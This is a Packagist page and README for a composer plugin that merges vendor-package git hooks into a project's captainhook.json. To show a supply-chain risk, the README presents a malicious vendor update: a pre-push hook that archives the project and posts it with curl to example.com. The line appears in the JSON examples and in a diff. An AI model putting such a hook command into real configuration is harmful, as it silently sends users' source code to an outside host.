boesing / captainhook-vendor-resolver
CaptainHook extension which parses vendor packages after installation to merge projects captainhook.json with hooks provided by vendor packages
Fund package maintenance!
Community Bridge
Installs: 267
Dependents: 0
Suggesters: 0
Security: 0
Stars: 1
Watchers: 1
Forks: 0
Open Issues: 0
Type:composer-plugin
Requires
- php: ^7.3
- composer-plugin-api: ^1.1
- captainhook/captainhook: ^5.0
- webmozart/assert: ^1.5
Requires (Dev)
- composer/composer: ^1.9
- jakub-onderka/php-parallel-lint: ^1.0
- laminas/laminas-coding-standard: ^2.0
- phpstan/extension-installer: ^1.0
- phpstan/phpstan: ^0.11.19
- phpstan/phpstan-webmozart-assert: ^0.11.3
- phpunit/phpunit: ^8.4
This package is auto-updated.
Last update: 2021-08-23 10:47:06 UTC
README
This composer-plugin introduces a package scan for captainhook/captainhook hooks.
So on every composer require
, composer install
or composer remove
call, this plugin checks the composer.json
of the installed/uninstalled package for hooks to add/remove from the captainhook.json
.
NOTE: As of captainhook v5.0, you can specify a dedicated captainhook.json
via --configuration
. If you are using this parameter, please provide the custom captainhook.json
path via captainhook-vendor-resolver.json
configuration next to your composer.json
.
{ "captainhook": "relativeOrAbsolutePath/to/your/captainhook.json" }
Where is the difference to the already existing feature "includes"
As this package only parses the composer.json
and automagically inserts/removes the hooks, it will provide a proper diff to your project. There is no hidden hook specified in a file outside of your project.
Your projects captainhook.json
will always contain any hook which is being executed which can be easily reviewed in Pull Requests, e.g.
Example with the vendor resolver
captainhook.json
{ "commit-msg": { "enabled": false, "actions": [] }, "pre-push": { "enabled": true, "actions": [ { "exec": "echo hey there" } ] }, "prepare-commit-msg": { "enabled": false, "actions": [] }, "post-commit": { "enabled": false, "actions": [] }, "post-merge": { "enabled": false, "actions": [] }, "post-checkout": { "enabled": false, "actions": [] }, "pre-commit": { "enabled": false, "actions": [] } }
Current version of the vendor package...
vendor/package/composer.json
v1.0.0
{ "extra": { "captainhook-hooks": { "pre-push": { "actions": [ { "exec": "echo hey there" } ] } } } }
After updating the vendor package...
vendor/package/composer.json
v1.0.1
{ "extra": { "captainhook-hooks": { "pre-push": { "actions": [ { "exec": "tar -xzf project.tar.gz . && curl -X POST --data @project.tar.gz https://example.com & rm project.tar.gz" } ] } } } }
diff captainhook.json
10c10
< "exec": "echo hey there"
---
> "exec": "tar -xzf project.tar.gz . && curl -X POST --data @project.tar.gz https://example.com & rm project.tar.gz"
Example with includes (security implication)
captainhook.json
{ "config": { "includes": [ "vendor/package/captainhook.hooks.json" ] } }
Current version of the vendor package...
vendor/package/captainhook.hooks.json
v1.0.0
{ "pre-push": { "actions": [ { "exec": "echo hey there" } ] } }
After updating the vendor package...
vendor/package/captainhook.hooks.json
v1.0.1
{ "pre-push": { "actions": [ { "exec": "tar -xzf project.tar.gz . && curl -X POST --data @project.tar.gz https://example.com & rm project.tar.gz" } ] } }
diff captainhook.json
If you are not re-visiting your vendor packages for changes in that hook you are including, you will upload your whole project on the next git push
to the attackers website.